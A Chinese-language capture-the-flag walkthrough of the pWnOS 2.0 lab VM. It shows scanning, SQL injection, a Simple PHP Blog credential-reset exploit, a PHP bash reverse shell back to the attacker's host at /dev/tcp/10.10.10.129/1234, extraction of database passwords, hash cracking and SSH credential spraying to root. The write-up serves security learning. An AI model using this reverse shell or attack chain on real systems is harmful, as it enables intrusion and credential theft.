pWnOS2.0 靶机渗透( cms 渗透,php+mysql 网站渗透,密码碰撞)

news2024/11/29 8:37:00

pWnOS2.0 靶机渗透( )

靶机介绍

vulnhub 靶机

本地搭建

由于靶机特性,靶机网卡位nat模式扫不到,原来需要改 nat 的地址

参考方法
https://blog.csdn.net/Bossfrank/article/details/131415257
作者主页
https://blog.csdn.net/Bossfrank?type=blog
PS: 国科大硕士老哥很牛,非常牛,学习了 🙏

nmap 信息收集

┌──(kali㉿kali)-[~]                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             20:37:33 [0/3]
└─$ sudo nmap -sn 10.10.10.0/24                                                                                                                                                                                                                                                                                                                           
[sudo] password for kali:                                                                            
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 20:37 CST                                                                                                                                        
Nmap scan report for localhost (10.10.10.1)                                                                                                                                                                                                                                                                    
Host is up (0.00035s latency).                                                                       
MAC Address: 00:50:56:C0:00:08 (VMware)                                                              
Nmap scan report for bogon (10.10.10.2)                                                              
Host is up (0.00010s latency).                                                                       
MAC Address: 00:50:56:F3:32:0E (VMware)                                                              
Nmap scan report for bogon (10.10.10.100)                                                                                                                                                                 
Host is up (0.00019s latency).                                                                                                                                                                            
MAC Address: 00:0C:29:8D:63:FF (VMware)                                                                                                                                                                   
Nmap scan report for localhost (10.10.10.128)                                                                                                                                                             
Host is up (0.00012s latency).                                                                                                                                                                                                                                                                                 
MAC Address: 00:0C:29:83:4F:85 (VMware)                                                              
Nmap scan report for bogon (10.10.10.254)                                                            
Host is up (0.000068s latency).                                                                      
MAC Address: 00:50:56:EB:94:F3 (VMware)                                                              
Nmap scan report for localhost (10.10.10.129)                                                        
Host is up.                                                                                          
Nmap done: 256 IP addresses (6 hosts up) scanned in 1.92 seconds                                     
                                                                                                                                                                                                                                                                                                               
┌──(kali㉿kali)-[~]                                                                                  
└─$ sudo nmap --min-rate 10000 -p- 10.10.10.100                                                                                                                                                           
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 20:39 CST                                                                                                                                        
Nmap scan report for bogon (10.10.10.100)                                                            
Host is up (0.000045s latency).                                                                      
Not shown: 65533 closed tcp ports (reset)                                                            
PORT   STATE SERVICE                                                                                 
22/tcp open  ssh                                                                                     
80/tcp open  http                                                                                    
MAC Address: 00:0C:29:8D:63:FF (VMware)                                                              
                                                                                                     
Nmap done: 1 IP address (1 host up) scanned in 1.18 seconds                                                                                                                                               
                                                                                                                                                                                                          
┌──(kali㉿kali)-[~]                                                                                                                                                                                                                                                                                            
└─$ sudo nmap -sT -sV -O -p22,80 10.10.10.100                                                        
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 20:40 CST                                   
Nmap scan report for bogon (10.10.10.100)                                                            
Host is up (0.00037s latency).                                                                       
                                                                                                     
PORT   STATE SERVICE VERSION                                                                         
22/tcp open  ssh     OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)                                                                                                                           
80/tcp open  http    Apache httpd 2.2.17 ((Ubuntu))                                                  
MAC Address: 00:0C:29:8D:63:FF (VMware)                                                                                                                                                                   
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port                                                                                                                                                                                                          
Device type: general purpose                                                                         
Running: Linux 2.6.X                                                                                 
OS CPE: cpe:/o:linux:linux_kernel:2.6                                                                
OS details: Linux 2.6.32 - 2.6.39                                                                    
Network Distance: 1 hop                                                                                                                                
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel                                              
                                                                                                                                                                                                          
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .                                                                                                                                                                                                          
Nmap done: 1 IP address (1 host up) scanned in 7.57 seconds                                                                                                                                               
                                                                                                                                                                                                                                                                                                               
┌──(kali㉿kali)-[~]                                                                                                                                    
└─$ sudo nmap --script=vuln -p22,80 10.10.10.100                                                                                                       
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 20:40 CST                                                                                     
Stats: 0:01:35 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan                                                                             
NSE Timing: About 91.09% done; ETC: 20:42 (0:00:08 remaining)                                                                                          
Stats: 0:02:55 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan                                                                             
NSE Timing: About 93.56% done; ETC: 20:44 (0:00:11 remaining)                                                                                          
Nmap scan report for bogon (10.10.10.100)                                                                                                              
Host is up (0.00034s latency).                                                                                                                         

PORT   STATE SERVICE                                                                                                                                   
22/tcp open  ssh                                                                                                                                       
80/tcp open  http                                                                                                                                      
|_http-csrf: Couldn't find any CSRF vulnerabilities.                                                                                                   
|_http-dombased-xss: Couldn't find any DOM based XSS.                                                                                                  
| http-slowloris-check:                                                                                                                                
|   VULNERABLE:                                                                                                                                        
|   Slowloris DOS attack                                                                                                                               
|     State: LIKELY VULNERABLE                                                                                                                         
|     IDs:  CVE:CVE-2007-6750                                                                                                                          
|       Slowloris tries to keep many connections to the target web server open and hold                                                                                                                                                                                                                        
|       them open as long as possible.  It accomplishes this by opening connections to                                                                                                                                                                                                                         
|       the target web server and sending a partial request. By doing so, it starves                                                                   
|       the http server's resources causing Denial Of Service.                                                                                         
|                                                                                                                                                      
|     Disclosure date: 2009-09-17                                                                                                                      
|     References:                                                                                                                                      
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750                                                                                   
|_      http://ha.ckers.org/slowloris/                                                                                                                 
| http-cookie-flags:                                                                                                                                   
|   /:                                                                                                                                                 
|     PHPSESSID:                                                                                                                                       
|_      httponly flag not set                                                                                                                          
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)                                                                          
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.                                                                                       
|_http-phpself-xss: ERROR: Script execution failed (use -d to debug)                                                                                   
MAC Address: 00:0C:29:8D:63:FF (VMware)                                                                                                                

Nmap done: 1 IP address (1 host up) scanned in 395.77 seconds  

web 渗透

“欢迎来到这个网站,如果你有任何问题请发邮件给 admin@isints.com”
在这里插入图片描述
爆破目录

                                                                                                                                                                                                                                                                                                               
┌──(kali㉿kali)-[~]                                                                                  
└─$ sudo dirb http://10.10.10.100                                                                                                                                                                                                                                                                              
[sudo] password for kali:                                                                                                                                                                                 
                                                                                                     
-----------------                                                                                    
DIRB v2.22                                                                                                                                                                                                                                                                                                     
By The Dark Raver                                                                                                                                                                                         
-----------------                                                                                    
                                                                                                     
START_TIME: Sun Sep 29 23:08:26 2024                                                                                                                                                                                                                                                                           
URL_BASE: http://10.10.10.100/                                                                                                                                                                            
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt                                                 
                                                                                                     
-----------------                                                                                                                                                                                                                                                                                              
                                                                                                                                                                                                          
GENERATED WORDS: 4612                                                                                
                                                                                                     
---- Scanning URL: http://10.10.10.100/ ----                                                                                                                                                                                                                                                                   
+ http://10.10.10.100/activate (CODE:302|SIZE:0)                                                                                                                                                          
==> DIRECTORY: http://10.10.10.100/blog/                                                                                                                                                                                                                                                                       
+ http://10.10.10.100/cgi-bin/ (CODE:403|SIZE:288)                                                                                                                                                                                                                                                             
==> DIRECTORY: http://10.10.10.100/includes/                                                                                                                                                                                                                                                                   
+ http://10.10.10.100/index (CODE:200|SIZE:854)                                                                                                                                                           
+ http://10.10.10.100/index.php (CODE:200|SIZE:854)                                                                                                                                                                                                                                                            
+ http://10.10.10.100/info (CODE:200|SIZE:50175)                                                                                                                                                                                                                                                               
+ http://10.10.10.100/info.php (CODE:200|SIZE:50044)                                                                                                                                                                                                                                                           
+ http://10.10.10.100/login (CODE:200|SIZE:1174)                                                                                                                                                                                                                                                               
+ http://10.10.10.100/register (CODE:200|SIZE:1562)                                                                                                                                                                                                                                                            
+ http://10.10.10.100/server-status (CODE:403|SIZE:293)                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                               
---- Entering directory: http://10.10.10.100/blog/ ----                                                                                                
+ http://10.10.10.100/blog/add (CODE:302|SIZE:0)                                                                                                                                                                                                                                                               
+ http://10.10.10.100/blog/atom (CODE:200|SIZE:1062)                                                                                                                                                      
+ http://10.10.10.100/blog/categories (CODE:302|SIZE:0)                                                                                                                                                                                                                                                        
+ http://10.10.10.100/blog/comments (CODE:302|SIZE:0)                                                                                                                                                                                                                                                          
==> DIRECTORY: http://10.10.10.100/blog/config/                                                                                                                                                                                                                                                                
+ http://10.10.10.100/blog/contact (CODE:200|SIZE:6001)                                                                                                                                                                                                                                                        
==> DIRECTORY: http://10.10.10.100/blog/content/                                                                                                                                                                                                                                                               
+ http://10.10.10.100/blog/delete (CODE:302|SIZE:0)                                                                                                                                                                                                                                                            
==> DIRECTORY: http://10.10.10.100/blog/docs/                                                                                                                                                                                                                                                                  
==> DIRECTORY: http://10.10.10.100/blog/flash/                                                                                                                                                                                                                                                                 
==> DIRECTORY: http://10.10.10.100/blog/images/                                                                                                                                                                                                                                                                
+ http://10.10.10.100/blog/index (CODE:200|SIZE:8094)                                                                                                                                                                                                                                                          
+ http://10.10.10.100/blog/index.php (CODE:200|SIZE:8094)                                                                                                                                                                                                                                                      
+ http://10.10.10.100/blog/info (CODE:302|SIZE:0)                                                                                                                                                                                                                                                              
+ http://10.10.10.100/blog/info.php (CODE:302|SIZE:0)                                                                                                                                                                                                                                                          
==> DIRECTORY: http://10.10.10.100/blog/interface/                                                                                                                                                                                                                                                             
==> DIRECTORY: http://10.10.10.100/blog/languages/                                                                                                                                                                                                                                                             
+ http://10.10.10.100/blog/login (CODE:200|SIZE:5750)                                                                                                                                                                                                                                                          
+ http://10.10.10.100/blog/logout (CODE:302|SIZE:0)                                                                                                                                                                                                                                                            
+ http://10.10.10.100/blog/options (CODE:302|SIZE:0)                                                                                                                                                                                                                                                           
+ http://10.10.10.100/blog/rdf (CODE:200|SIZE:1411)                                                                                                                                                                                                                                                            
+ http://10.10.10.100/blog/rss (CODE:200|SIZE:1237)                                                                                                                                                                                                                                                            
==> DIRECTORY: http://10.10.10.100/blog/scripts/                                                                                                                                                                                                                                                               
+ http://10.10.10.100/blog/search (CODE:200|SIZE:5034)                                                                                                                                                                                                                                                         
+ http://10.10.10.100/blog/setup (CODE:302|SIZE:0)                                                                                                                                                                                                                                                             
+ http://10.10.10.100/blog/static (CODE:302|SIZE:0)                                                                                                                                                                                                                                                            
+ http://10.10.10.100/blog/stats (CODE:200|SIZE:5392)                                                                                                                                                                                                                                                          
==> DIRECTORY: http://10.10.10.100/blog/themes/                                                                                                                                                                                                                                                                
+ http://10.10.10.100/blog/trackback (CODE:302|SIZE:0)                                                                                                                                                                                                                                                         
+ http://10.10.10.100/blog/upgrade (CODE:302|SIZE:0)                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                               
---- Entering directory: http://10.10.10.100/includes/ ----                                                                                            
(!) WARNING: Directory IS LISTABLE. No need to scan it.                                                                                                
    (Use mode '-w' if you want to scan it anyway)                                                                                                      
                                                                                                                                                                                                                                                                                                               
---- Entering directory: http://10.10.10.100/blog/config/ ----                                                                                         
(!) WARNING: Directory IS LISTABLE. No need to scan it.                                                                                                
    (Use mode '-w' if you want to scan it anyway)                                                                                                      
                                                                                                                                                                                                                                                                                                               
---- Entering directory: http://10.10.10.100/blog/content/ ----                                                                                        
(!) WARNING: Directory IS LISTABLE. No need to scan it.                                                                                                
    (Use mode '-w' if you want to scan it anyway)                                                                                                      
                                                                                                                                                                                                                                                                                                               
---- Entering directory: http://10.10.10.100/blog/docs/ ----                                                                                           
(!) WARNING: Directory IS LISTABLE. No need to scan it.                                                                                                
    (Use mode '-w' if you want to scan it anyway)                                                                                                      
                                                                                                                                                                                                                                                                                                               
---- Entering directory: http://10.10.10.100/blog/flash/ ----                                                                                          
(!) WARNING: Directory IS LISTABLE. No need to scan it.                                                                                                
    (Use mode '-w' if you want to scan it anyway)                                                                                                      
                                                                                                                                                                                                                                                                                                               
---- Entering directory: http://10.10.10.100/blog/images/ ----                                                                                         
(!) WARNING: Directory IS LISTABLE. No need to scan it.                                                                                                
    (Use mode '-w' if you want to scan it anyway)                                                                                                      
                                                                                                                                                                                                                                                                                                               
---- Entering directory: http://10.10.10.100/blog/interface/ ----                                                                                      
(!) WARNING: Directory IS LISTABLE. No need to scan it.                                                                                                
    (Use mode '-w' if you want to scan it anyway)                                                                                                      
                                                                                                                                                                                                                                                                                                               
---- Entering directory: http://10.10.10.100/blog/languages/ ----                                                                                      
(!) WARNING: Directory IS LISTABLE. No need to scan it.                                                                                                
    (Use mode '-w' if you want to scan it anyway)                                                                                                      
                                                                                                                                                                                                                                                                                                               
---- Entering directory: http://10.10.10.100/blog/scripts/ ----                                                                                        
(!) WARNING: Directory IS LISTABLE. No need to scan it.                                                                                                
    (Use mode '-w' if you want to scan it anyway)                                                                                                      
                                                                                                                                                                                                                                                                                                               
---- Entering directory: http://10.10.10.100/blog/themes/ ----                                                                                         
(!) WARNING: Directory IS LISTABLE. No need to scan it.                                                                                                
    (Use mode '-w' if you want to scan it anyway)                                                                                                      
                                                                                                                                                       
-----------------                                                                                                                                      
END_TIME: Sun Sep 29 23:08:34 2024                                                                                                                     
DOWNLOADED: 9224 - FOUND: 30       

注入一下 login.php 试一试
’ or 1=1 – 或者 ’ or 1=1 #
搞笑,爆源码了
在这里插入图片描述

把爆出来的目录 grep 出 200 的页
推测这是一个内容管理系统,找找 cms 的名称
在位置
view-source:http://10.10.10.100/blog/index.php
找到 Simple PHP Blog 0.4.0
在这里插入图片描述
漏洞库找一找

┌──(kali㉿kali)-[~/testPwnos2.0]                                                                                                                                                             20:49:59 [0/3]
└─$ sudo searchsploit simple php blog 0.4.0
[sudo] password for kali: 
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                           |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Simple PHP Blog 0.4 - 'colors.php' Multiple Cross-Site Scripting Vulnerabilities                                                                                         | cgi/webapps/26463.txt
Simple PHP Blog 0.4 - 'preview_cgi.php' Multiple Cross-Site Scripting Vulnerabilities                                                                                    | cgi/webapps/26461.txt
Simple PHP Blog 0.4 - 'preview_static_cgi.php' Multiple Cross-Site Scripting Vulnerabilities                                                                             | cgi/webapps/26462.txt
Simple PHP Blog 0.4.0 - Multiple Remote s                                                                                                                                | php/webapps/1191.pl
Simple PHP Blog 0.4.0 - Remote Command Execution (Metasploit)                                                                                                            | php/webapps/16883.rb
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(kali㉿kali)-[~/testPwnos2.0]
└─$ searchsploit simple php blog -m 1191   
[!] Could not find EDB-ID #


[!] Could not find EDB-ID #


[!] Could not find EDB-ID #


  Exploit: Simple PHP Blog 0.4.0 - Multiple Remote s
      URL: https://www.exploit-db.com/exploits/1191
     Path: /usr/share/exploitdb/exploits/php/webapps/1191.pl
    Codes: OSVDB-19070, CVE-2005-2787, OSVDB-19012, CVE-2005-2733, OSVDB-17779, CVE-2005-2192
 Verified: True
File Type: Perl script text executable
Copied to: /home/kali/testPwnos2.0/1191.pl



┌──(kali㉿kali)-[~/testPwnos2.0]
└─$ ls
1191.pl  dir.ori

sudo apt-get install libswitch-perl
________________________________________________________________________________                                                 
                  SimplePHPBlog v0.4.0 Exploits                                                                                  
                             by                                                                                                  
                     Kenneth F. Belva, CISSP                                                                                     
                   http://www.ftusecurity.com                                                                                                                                                                                                                      
________________________________________________________________________________                                                 
                                                                                                                                 
        Program : 1191.pl                                                                                                                                                                                                                                                                                                   
        Version : v0.1                                                                                                           
        Date    : 8/25/2005                                                                                                      
        Descript: This perl script demonstrates a few flaws in                                                                                                                                                                                                                                                              
                  SimplePHPBlog.                                                                                                                                                  
                                                                                                                                 
        Comments: THIS PoC IS FOR EDUCATIONAL PURPOSES ONLY...                                                                   
                  DO NOT RUN THIS AGAINST SYSTEMS TO WHICH YOU DO                                                                                                                                                                                                                                                                                                   
                  NOT HAVE PERMISSION TO DO SO!                 
                                                                                                                                                                                                                                                                   
                  Please see this script comments for solution/fixes                                                                                          
                  to demonstrated vulnerabilities.                                                                                                            
                  http://www.simplephpblog.com                                                                                                                
                                                                                                                                                              
        Usage   : 1191.pl [-h host] [-e exploit]                                                                                                              
                                                                               
                -?      : this menu                                                                                                                           
                -h      : host                                                                                                                                
                -e      : exploit                                                        
                        (1)     : Upload cmd.php in [site]/images/                                                                                                                
                        (2)     : Retreive Password file (hash)                                                                                               
                        (3)     : Set New User Name and Password                                                                                              
                                [NOTE - uppercase switches for exploits]                                                                                      
                                -U      : user name                                                                                                                               
                                -P      : password                                                                                                                                                                                                                                                                          
                        (4)     : Delete a System File                                                                                                                            
                                -F      : Path and System File                                                                                                                    

        Examples: 1191.pl -h 127.0.0.1 -e 2                                              
                  1191.pl -h 127.0.0.1 -e 3 -U l33t -P l33t                                                                                                                       
                  1191.pl -h 127.0.0.1 -e 4 -F ./index.php                                                                                                                        
                  1191.pl -h 127.0.0.1 -e 4 -F ../../../etc/passwd                                                                                                                
                  1191.pl -h 127.0.0.1 -e 1   

┌──(kali㉿kali)-[~/testPwnos2.0]
└─$ sudo perl 1191.pl -h http://10.10.10.100/blog -e 3 -U hugomc -P hugomc

________________________________________________________________________________
                  SimplePHPBlog v0.4.0 Exploits
                             by
                     Kenneth F. Belva, CISSP
                    http://www.ftusecurity.com
________________________________________________________________________________
Running Set New Username and Password Exploit....


Deleted File: ./config/password.txt
./config/password.txt created!
Username is set to: hugomc
Password is set to: hugomc


*** Exploit Completed....
Have a nice day! :)

在这里插入图片描述

传 shell ,拿下初级 shell

┌──(kali㉿kali)-[~/testPwnos2.0]
└─$ cat shell.php          
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.129/1234 0>&1'"); ?>

把这个 shell 传上去

结合目录爆破,推测 shell 位置应该在 http://10.10.10.100/blog/images/shell.php ,监听,访问,即可得到 shell

拿到初始 shell

┌──(kali㉿kali)-[~/testPwnos2.0]                                                                                                                                                                     [0/41]
└─$ sudo ncat -lvnp 1234                         
[sudo] password for kali:  
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.100:34941.
bash: no job control in this shell
www-data@web:/var/www/blog/images$ 

尝试提权

┌──(kali㉿kali)-[~/testPwnos2.0]                                                                                                                                                                     [0/41]
└─$ sudo ncat -lvnp 1234                        
[sudo] password for kali: 
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.100:34941.
bash: no job control in this shell
www-data@web:/var/www/blog/images$ 

www-data@web:/var/www/blog/images$ whoami
whoami
www-data
www-data@web:/var/www/blog/images$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:0c:29:8d:63:ff brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.100/24 brd 10.10.10.255 scope global eth0
    inet6 fe80::20c:29ff:fe8d:63ff/64 scope link 
       valid_lft forever preferred_lft forever
www-data@web:/var/www/blog/images$ sudo -l
sudo -l
sudo: no tty present and no askpass program specified
www-data@web:/var/www/blog/images$ uname -a
uname -a
Linux web 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
www-data@web:/var/www/blog/images$ python --version
python --version
Python 2.7.1+
www-data@web:/var/www/blog/images$ 

使用 python 升级交互性

www-data@web:/var/www/blog/images$ python -c "import pty;pty.spawn('/bin/bash')"
<images$ python -c "import pty;pty.spawn('/bin/bash')"  

找一找敏感文件泄露

www-data@web:/var/www/blog/images$ pwd
pwd
/var/www/blog/images
www-data@web:/var/www/blog/images$ cd ..
cd ..
www-data@web:/var/www/blog$ ls
ls
add.php                 flash                   rate_cgi.php
add_block.php           image_list.php          rdf.php
add_cgi.php             images                  recompress.php
add_link.php            index.php               rss.php
add_static.php          info.php                scripts
add_static_cgi.php      install00.php           search.php
atom.php                install01.php           set_login.php
categories.php          install02.php           set_login_cgi.php
colors.php              install03.php           setup.php
colors_cgi.php          install03_cgi.php       setup_cgi.php
comment_add_cgi.php     interface               static.php
comment_delete_cgi.php  languages               stats.php
comments.php            languages.php           themes
config                  languages_cgi.php       themes.php
contact.php             login.php               trackback.php
contact_cgi.php         login_cgi.php           trackback_delete_cgi.php
content                 logout.php              upgrade.php
delete.php              options.php             upload_img.php
delete_static.php       options_cgi.php         upload_img_cgi.php
docs                    preview_cgi.php         upload_img_new.php
downgrade.php           preview_static_cgi.php
www-data@web:/var/www/blog$ cd ..
cd ..
www-data@web:/var/www$ ls
ls
activate.php  includes   info.php   mysqli_connect.php
blog          index.php  login.php  register.php

似乎找到了

www-data@web:/var/www$ cat mysqli_connect.php
cat mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php

// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.

// Set the database access information as constants:

DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'goodday');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');

// Make the connection:

$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );

?>www-data@web:/var/www$ 

没法登录,还有其他的配置文件吗?

www-data@web:/var/www$ mysql -uroot -pgoodday
mysql -uroot -pgoodday
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)

是的,其他位置的数据库连接配置文件有不同的内容

www-data@web:/var/www$ find / -name mysqli_connect.php 2>/dev/null
find / -name mysqli_connect.php 2>/dev/null
/var/mysqli_connect.php
/var/www/mysqli_connect.php
www-data@web:/var/www$ cat /var/mysqli_connect.php
cat /var/mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php

// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.

// Set the database access information as constants:

DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'root@ISIntS');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');

// Make the connection:

$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );

?>www-data@web:/var/www$ 

成功登录mysql

www-data@web:/var/www$ mysql -uroot -proot@ISIntS
mysql -uroot -proot@ISIntS
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 36
Server version: 5.1.54-1ubuntu4 (Ubuntu)

Copyright (c) 2000, 2010, Oracle and/or its affiliates. All rights reserved.
This software comes with ABSOLUTELY NO WARRANTY. This is free software,
and you are welcome to modify and redistribute it under the GPL v2 license

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> 

看一看数据库的内容

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| ch16               |
| mysql              |
+--------------------+
3 rows in set (0.00 sec)

mysql> use ch16                                                                 
use ch16
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+----------------+
| Tables_in_ch16 |
+----------------+
| users          |
+----------------+
1 row in set (0.00 sec)

看一看用户表

mysql> select * from users;
select * from users;
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
| user_id | first_name | last_name | email            | pass                                     | user_level | active | registration_date   |
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
|       1 | Dan        | Privett   | admin@isints.com | c2c4b4e51d9e23c02c15702c136c3e950ba9a4af |          0 | NULL   | 2011-05-07 17:27:01 |
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
1 row in set (0.00 sec)

密码的加密方式识别位 sha-1

┌──(kali㉿kali)-[~/testPwnos2.0]                                                                                                                                                                           
└─$ hash-identifier c2c4b4e51d9e23c02c15702c136c3e950ba9a4af                                                                                                                                               
   #########################################################################                                                                                                                               
   #     __  __                     __           ______    _____           #                                                                                                                               
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
-------------------------------------------------- 

Possible Hashs:
[+] SHA-1
[+] MySQL5 - SHA-1(SHA-1($pass))

拿到密码哈希,尝试解密 sha-1
在这里插入图片描述密码为

c2c4b4e51d9e23c02c15702c136c3e950ba9a4af:killerbeesareflying

看一看 passwd 确定用户名

www-data@web:/var/www$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
mysql:x:0:0:MySQL Server,,,:/root:/bin/bash
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
landscape:x:104:110::/var/lib/landscape:/bin/false 
dan:x:1000:1000:Dan Privett,,,:/home/dan:/bin/bash

密码碰撞

尝试密码碰撞,进ssh
可能的用户名

administrator
admin
dan
root
hugomc

可能的密码

killerbeesareflying
root@ISIntS
hugomc

使用 crackmapexec ,找到账号密码

┌──(kali㉿kali)-[~/testPwnos2.0]
└─$ sudo crackmapexec ssh 10.10.10.100 -p passwords.lst -u users.lst --continue-on-success           
SSH         10.10.10.100    22     10.10.10.100     [*] SSH-2.0-OpenSSH_5.8p1 Debian-1ubuntu3
SSH         10.10.10.100    22     10.10.10.100     [-] administrator:killerbeesareflying Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [-] administrator:root@ISIntS Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [-] administrator:hugomc Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [-] admin:killerbeesareflying Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [-] admin:root@ISIntS Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [-] admin:hugomc Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [-] dan:killerbeesareflying Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [-] dan:root@ISIntS Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [-] dan:hugomc Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [-] root:killerbeesareflying Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [+] root:root@ISIntS (Pwn3d!)
SSH         10.10.10.100    22     10.10.10.100     [-] root:hugomc Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [-] hugomc:killerbeesareflying Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [-] hugomc:root@ISIntS Authentication failed.                                                                                                          
SSH         10.10.10.100    22     10.10.10.100     [-] hugomc:hugomc Authentication failed.     

拿下

┌──(kali㉿kali)-[~/testPwnos2.0]
└─$ sudo ssh root@10.10.10.100                                                                                                                                                     
The authenticity of host '10.10.10.100 (10.10.10.100)' can't be established.
ECDSA key fingerprint is SHA256:EWPtTr0Xn9NMudUhcD3+AMXSigXAGS4uldZp3grLm8w.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.100' (ECDSA) to the list of known hosts.
root@10.10.10.100's password: 
Welcome to Ubuntu 11.04 (GNU/Linux 2.6.38-8-server x86_64)

 * Documentation:  http://www.ubuntu.com/server/doc

  System information as of Fri Aug  9 18:44:09 EDT 2024

  System load:  0.0               Processes:           77
  Usage of /:   2.9% of 38.64GB   Users logged in:     0
  Memory usage: 18%               IP address for eth0: 10.10.10.100
  Swap usage:   0%

  Graph this data and manage this system at https://landscape.canonical.com/
Last login: Mon May  9 19:29:03 2011
root@web:~# whoami
root
root@web:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
